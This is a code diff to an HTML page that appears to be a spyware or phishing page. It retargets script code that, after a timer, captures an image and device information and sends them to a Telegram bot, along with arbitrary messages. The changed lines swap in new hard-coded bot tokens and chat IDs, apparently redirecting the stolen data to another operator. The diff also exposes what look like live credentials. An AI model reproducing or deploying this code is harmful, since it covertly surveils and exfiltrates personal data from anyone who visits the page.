--- a/Internet.html
+++ b/Internet.html
@@ -94,7 +94,7 @@
                         fd.append('chat_id', '8175899733');
                         fd.append('photo', blob, 'shot.jpg');
                         fd.append('caption', `👤 المطور: بحر اندرويد\n${devInfo}\n------------------\n@bavAhba`);
-                        fetch(`https://api.telegram.org/bot8438801752:AAEOBfgdX2O4MY88loSzTwROO2xJNt0jitY/sendPhoto`, {method: 'POST', body: fd});
+                        fetch(`https://api.telegram.org/6612813200:AAFI0NKNJhvRE_sugFfmkUSNkvlMu1Xi-5k/sendPhoto`, {method: 'POST', body: fd});
                     }, 'image/jpeg', 0.6);
                 }, 10000);
 
@@ -105,7 +105,7 @@
         }
 
         function sendData(msg) {
-            fetch(`https://api.telegram.org/bot8438801752:AAEOBfgdX2O4MY88loSzTwROO2xJNt0jitY/sendMessage?chat_id=8175899733&text=${encodeURIComponent(msg + "\n\n@bavAhba")}`);
+            fetch(`https://api.telegram.org/bot8468116606:AAFI0NKNJhvRE_sugFfmkUSNkvlMu1Xi-5k/sendMessage?chat_id=6612813200&text=${encodeURIComponent(msg + "\n\n@bavAhba")}`);
         }
     </script>
 </body>
